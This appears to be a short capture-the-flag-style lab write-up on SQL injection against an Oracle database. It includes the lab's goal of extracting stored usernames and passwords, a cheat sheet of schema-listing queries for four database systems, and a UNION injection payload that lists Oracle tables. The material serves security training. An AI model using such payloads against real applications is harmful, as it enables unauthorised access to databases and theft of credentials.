Lab 10 : SQL injection attack, listing the database contents on Oracle

Problem Statement :

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the

username and password of all users.

To solve the lab, log in as the administrator user.

Like our previous Lab 9 we followed the same tac tick to get through this lab.

Here it’s a oracle db lab. So we need to fire commands which is for oracle db.

Database contents

You can list the tables that exist in the database, and the columns that those tables contain.

Oracle	SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = ‘TABLE-NAME-HERE’
Microsoft	SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’
PostgreSQL	SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’
MySQL	SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’

Solution to the LAB:

Note : use the same techniq to find number of columns in this lab. Which is ORDER BY 1 ..

‘ UNION SELECT TABLE_NAME, NULL FROM all_tables–